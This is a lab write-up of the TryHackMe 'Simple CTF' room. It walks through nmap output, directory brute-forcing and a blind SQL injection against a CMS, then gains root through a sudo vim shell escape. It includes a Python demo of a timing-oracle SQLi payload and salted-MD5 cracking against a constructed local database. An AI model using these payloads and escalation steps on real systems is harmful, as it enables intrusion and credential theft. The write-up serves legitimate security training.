[THM] Simple CTF

Information gathering

Once you have the IP, start with an nmap scan to find the open ports and the services behind them:

nmap -sV -sC -v 10.49.128.162          
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-02 03:31 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:31
Completed NSE at 03:31, 0.00s elapsed
Initiating NSE at 03:31
Completed NSE at 03:31, 0.00s elapsed
Initiating NSE at 03:31
Completed NSE at 03:31, 0.00s elapsed
Initiating Ping Scan at 03:31
Scanning 10.49.128.162 [4 ports]
Completed Ping Scan at 03:31, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:31
Completed Parallel DNS resolution of 1 host. at 03:31, 0.02s elapsed
Initiating SYN Stealth Scan at 03:31
Scanning 10.49.128.162 [1000 ports]
Discovered open port 80/tcp on 10.49.128.162
Discovered open port 21/tcp on 10.49.128.162
Discovered open port 2222/tcp on 10.49.128.162
Completed SYN Stealth Scan at 03:32, 9.98s elapsed (1000 total ports)
Initiating Service scan at 03:32
Scanning 3 services on 10.49.128.162
Completed Service scan at 03:32, 6.38s elapsed (3 services on 1 host)
NSE: Script scanning 10.49.128.162.
Initiating NSE at 03:32
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 03:32, 30.80s elapsed
Initiating NSE at 03:32
Completed NSE at 03:32, 1.04s elapsed
Initiating NSE at 03:32
Completed NSE at 03:32, 0.00s elapsed
Nmap scan report for 10.49.128.162
Host is up (0.14s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.190.111
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 03:32
Completed NSE at 03:32, 0.00s elapsed
Initiating NSE at 03:32
Completed NSE at 03:32, 0.00s elapsed
Initiating NSE at 03:32
Completed NSE at 03:32, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.89 seconds
Raw packets sent: 2007 (88.260KB) | Rcvd: 10 (412B)

Only three ports are open: HTTP (80), FTP (21) and SSH (2222). That alone answers the first two questions of the room (how many services are below port 1000, and what runs on the higher port).

Next we need a CVE to use against the application. I first searched for vulnerabilities in the versions shown above (Apache 2.4.18, OpenSSH 7.2p2, vsftpd 3.0.3), but nothing fit well, so I figured the HTTP service had more to offer.

Brute-forcing directories with dirsearch turned up a /simple directory. Scrolling to the bottom of that page shows the version, 2.2.8, so the vulnerability is most likely in this CMS.

A search on exploit-db did find a working exploit for a matching version range: a time-based blind SQL injection (SQLi) that recovers the username and password hash from the database and then cracks the hash against a wordlist.

Download the Python script and run it; it takes two parameters, -u (the target URL) and -w (the wordlist). I used rockyou.txt and the password came out almost immediately.
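To show what the exploit script is actually doing in those two stages (time-based blind extraction of salt and hash, then offline cracking), here is an added example. It is not the exploit-db script and not the CMS's code: the vulnerable endpoint is a constructed stand-in built on an in-memory SQLite database with a registered sleep() function playing the role of MySQL's SLEEP(), the user table, salt, hash and mini wordlist are constructed demo data, and the md5(salt || password) hash format is an assumption made for the cracking stage.

```python
import hashlib
import sqlite3
import time
from typing import Callable, Optional, Tuple

# Constructed demo data (not credentials from the room). The store is assumed
# to hold md5(salt || password); that assumption drives the cracking stage.
DEMO_SALT = "a1b2"
DEMO_PASSWORD = "sunflower"
DEMO_HASH = hashlib.md5((DEMO_SALT + DEMO_PASSWORD).encode()).hexdigest()
DELAY = 0.03           # seconds the injected sleep() adds when a condition holds
THRESHOLD = DELAY / 2  # responses slower than this are read as "condition true"

Oracle = Callable[[str], bool]


class VulnerableApp:
    """Stand-in for the vulnerable web app: it builds SQL by string
    concatenation, and the database exposes a sleep() function, mirroring
    the MySQL SLEEP() that time-based payloads rely on."""

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.create_function("sleep", 1, lambda s: time.sleep(s) or 1)
        self.db.execute("CREATE TABLE users (username TEXT, salt TEXT, password TEXT)")
        self.db.execute("INSERT INTO users VALUES ('admin', ?, ?)", (DEMO_SALT, DEMO_HASH))
        self.db.commit()

    def lookup(self, username: str) -> str:
        # The bug: untrusted input is interpolated straight into the query.
        sql = f"SELECT username FROM users WHERE username = '{username}'"
        rows = self.db.execute(sql).fetchall()
        return "found" if rows else "not found"  # the body leaks nothing; only time does


def timing_oracle(app: VulnerableApp, condition: str) -> bool:
    """Ask the database a yes/no question and read the answer off the clock.
    The payload closes the quote, ORs in a CASE that only reaches sleep()
    when the condition is true, and comments out the rest of the query."""
    payload = f"x' OR (CASE WHEN ({condition}) THEN sleep({DELAY}) ELSE 0 END) -- "
    start = time.perf_counter()
    app.lookup(payload)
    return time.perf_counter() - start >= THRESHOLD


def extract_length(oracle: Oracle, expr: str, max_len: int = 64) -> int:
    """Binary-search length(expr) using 'length(expr) > n' questions."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle: Oracle, expr: str, charset: str) -> str:
    """Recover expr one character at a time, binary-searching each position
    over the sorted charset: 4 questions per hex character instead of 16.
    charset must not contain a single quote (it is embedded in the payload)."""
    charset = "".join(sorted(charset))
    out = []
    for pos in range(1, extract_length(oracle, expr) + 1):
        lo, hi = 0, len(charset) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({expr}, {pos}, 1)) > unicode('{charset[mid]}')"):
                lo = mid + 1
            else:
                hi = mid
        out.append(charset[lo])
    return "".join(out)


def dump_credentials(app: VulnerableApp, target_user: str = "admin") -> Tuple[str, str]:
    """Stage 1 of the exploit: pull salt and hash for one user via timing."""
    oracle: Oracle = lambda cond: timing_oracle(app, cond)
    hexchars = "0123456789abcdef"
    salt = extract_string(oracle, f"(SELECT salt FROM users WHERE username = '{target_user}')", hexchars)
    pw_hash = extract_string(oracle, f"(SELECT password FROM users WHERE username = '{target_user}')", hexchars)
    return salt, pw_hash


def crack_salted_md5(salt: str, target_hash: str, wordlist) -> Optional[str]:
    """Stage 2, offline: try each candidate as md5(salt || candidate), the job
    the exploit script does with -w rockyou.txt."""
    for word in wordlist:
        word = word.strip()
        if hashlib.md5((salt + word).encode()).hexdigest() == target_hash:
            return word
    return None


# Constructed mini wordlist standing in for rockyou.txt.
DEMO_WORDLIST = ["123456", "password", "letmein", "sunflower", "qwerty"]

if __name__ == "__main__":
    app = VulnerableApp()
    salt, pw_hash = dump_credentials(app)
    print(f"salt={salt} hash={pw_hash}")
    print("password:", crack_salted_md5(salt, pw_hash, DEMO_WORDLIST))
```

The oracle decides only from elapsed time, so the threshold is what makes or breaks the attack on a real network: set the injected delay well above the target's latency jitter, and retry a position if a measurement lands near the threshold. The hash itself never appears in any response; it is reconstructed entirely from about four yes/no questions per character.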

Privilege escalation

These credentials get you into the CMS admin backend. I fumbled around in there for a while before remembering that there is also an SSH service to try them against.

Note that SSH listens on port 2222, so the port has to be given explicitly (ssh -p 2222); I lost some time before noticing that.

Once logged in, user.txt is right in the user's home directory and can simply be cat'd.

Running ls /home reveals another user, sunbath.

For the final step I uploaded the LinEnum enumeration script. Its output immediately pointed at the escalation path: vim is allowed via sudo (the same thing sudo -l would have shown).

The escape works just like the vi one: run sudo vim, press Esc, then type :!bash and you get a shell as root.

The root flag is then waiting in /root.